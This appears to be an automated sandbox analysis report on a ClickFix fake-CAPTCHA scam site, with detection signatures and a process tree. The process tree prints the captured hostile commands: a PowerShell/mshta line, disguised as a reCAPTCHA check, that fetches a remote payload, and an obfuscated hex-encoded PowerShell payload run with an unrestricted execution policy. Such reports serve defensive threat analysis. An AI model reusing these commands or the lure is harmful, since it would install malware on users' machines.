Edit tour
Windows
Analysis Report
http://annavirgili.com
Overview
Detection
CAPTCHA Scam ClickFix
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detect drive by download via clipboard copy & paste
Yara detected CAPTCHA Scam ClickFix
Connects to a pastebin service (likely for C&C)
Encrypted powershell cmdline option found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTML page contains hidden javascript code
HTML page contains obfuscated script src
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Stores files to the Windows start menu directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64_ra
- svchost.exe (PID: 7100 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- chrome.exe (PID: 5892 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://a nnavirgili .com/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 6684 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2184 --fi eld-trial- handle=198 4,i,163190 3431402749 0977,61693 9301086671 0073,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- powershell.exe (PID: 1952 cmdline:
"C:\Window s\system32 \WindowsPo werShell\v 1.0\PowerS hell.exe" . \*i*\\\\ \\\\\\\\\\ \\\\\\\\\\ \\\\\*2\m? ?ta.??? ht tps://yxyz .zyxy.org/ MARBI.mp4? u=d4a7bb1a -1651-4566 -9e40-7a8a 87d785c1 # ? ''I am not a robo t - reCAPT CHA Verifi cation ID: 7126'' MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2784 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - mshta.exe (PID: 2628 cmdline:
"C:\Window s\System32 \mshta.exe " https:// yxyz.zyxy. org/MARBI. mp4?u=d4a7 bb1a-1651- 4566-9e40- 7a8a87d785 c1 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 5108 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction WXnd L($cIxW){r eturn -spl it ($cIxW -replace ' ..', '0x$& ')};$Ggxu = WXndL(' 7A5B64CCD9 6D57D64EFE 4A812D2BC4 BDE9AE1B1E 7F65468F80 EA3D5B60B7 D7C15F2443 A3E6237EAB 1F9F3E91A5 D835EB18A4 48CE892FC6 25BA5CB4E7 734FA0B152 E164A9AE08 D0FEF9B18C 700BA2C123 C96722C862 D347993D0A A1AF4AEEBD D9B33579FD 0C0E3E8F4E D828B8EBE6 7830131A56 7BC4410ED3 DE3DB18288 1AB06E5D12 06E78F5AB5 BC320CEB0C D1230E202D 819C71580B 2958CC5C0E 8D1B8BD337 0ED4F7231F 1F5798BCD1 F65460270B 2E1E6ED598 63C8B5F03F 81A685BAD5 E7B10E0FB9 D1E708A9E5 C024FA30DD C882FC492E 0DF9584556 65B085A89C 33E2271C04 60170B1A54 4FCCC02AAD 22554D5904 FEDB87E266 16ADC6815B 78E3F211EC E66EE7D581 8C58FD2367 560D21420D 5A870A96BF 6813F16918 FD2CAE995E 81E5D5EEE7 64267ADB4E 5F453DAC47 D2AA762258 E397C75CFF 7333F5692F C5E25513BA C939EC2D35 D580E47B77 3762AFA92B 8C33B29E59 6DD3C52FB4 B99790BC72 803AD41F0A 8088B6CBED 15134D7A37 95F91350D8 363992E47B C33998786B 02F2BC54DE ADA79DA25C DD4E8456CD E732FF3D1B D51FFB619B BF4745E1D5 B394630DE4 C65145A4F4 0D54FC2FDF FF60DAC237 0A34BE793B 19A62E7BFB 4C17185C1D C5324F37FF B32F313CB1 BD87D5ED80 FDE6998A2F A6EAE03175 9049B99236 C74EBE0FCA A0366DFBD6 D5203BB793 793C30DD6C 7711F13948 7A16F956DE D2456E89DA 6E8075E848 518861F83E 12FE6B6D94 18FC30B864 23F75566F6 B84368C093 B9C427A827 CCA5508786 A5C0C9C4FD C8098CF6F6 387EF1B677 9E7520FFA6 CB54F1831F 4AA87E12F0 48C0CF6F76 26832EEACA 8F18970723 839BC8DF8E 4A95B07925 80CB979CFC 7127742BFA C8575A8762 0516BE0330 CEEEC026AE 6DEF880792 88ADA09199 3D6A1E4095 B56E7A4972 D51CC3305B 770FFD659D 6DF1A16842 FAB38AB77C 79C33863A3 DDD3492894 F183BE23A2 F13E9B123C 61AAA62EA1 7F6E370D5F 5455BDCBE4 0447C979E2 071A5E1C73 DAB66505D5 097B0CE259 E3740A4D33 6C5D9D478B 4BDD16372B C7EDFE1881 DEA74E5B9C E7264F939F C71C1A4041 55682C5463 91908E072F ABB77AFA55 EF85CF8D46 3AF296CB5A 97F75A04C2 7BB522CBD6 647D3486CE 6F1255A20C 9F533CBB8E 6386105492 0A4CAC251B CE2877D09D 44209DF14F 219EFB4C83 461ED25DD0 5A3920BE2B 123C394CC7 5C22C37A1C BE663656DB BC5E092E0B 0019D29905 01F5747EEB CB04B62841 0E9A300AEF 287CFF0E68 91F2F376C6 86F5FA861C 85F88D563C E6DA2BAF18 5CC7C432FB C4291B50D6 C71EC3AF86 F793050E7D A9386849A6 6D23F884A8 EBB084B1E5 2AFD97FC48 ED50A9E612 7344548B3E 1D3FE46A9B 700E235239 33F2658A2E 11359A7801 DCFA20518A 8C8ECFB897 185694E264 D854CE8307 694F52B05B 1F77A162CF 1DD6266ACF 5A7558C449 4FF2E5B813 EA6AA2F10A 626FA53624 CAEFB65B0B EBCCBCE907 FC29AFF64D 665F485763 17019CB117 E486DB9344 CB12B5A4C8 C99244F69A 2C044F0C2B 1E2C015323 E6F2E99639 37F86A2F61 0B470A7875 92B51B4A8A 0AC1BEBCFB A6BDBBAE60 1BE25E9697 ED1F1F6620 B93F5E571C 3E1A4F0E8C 47093BF22D A12E6490B3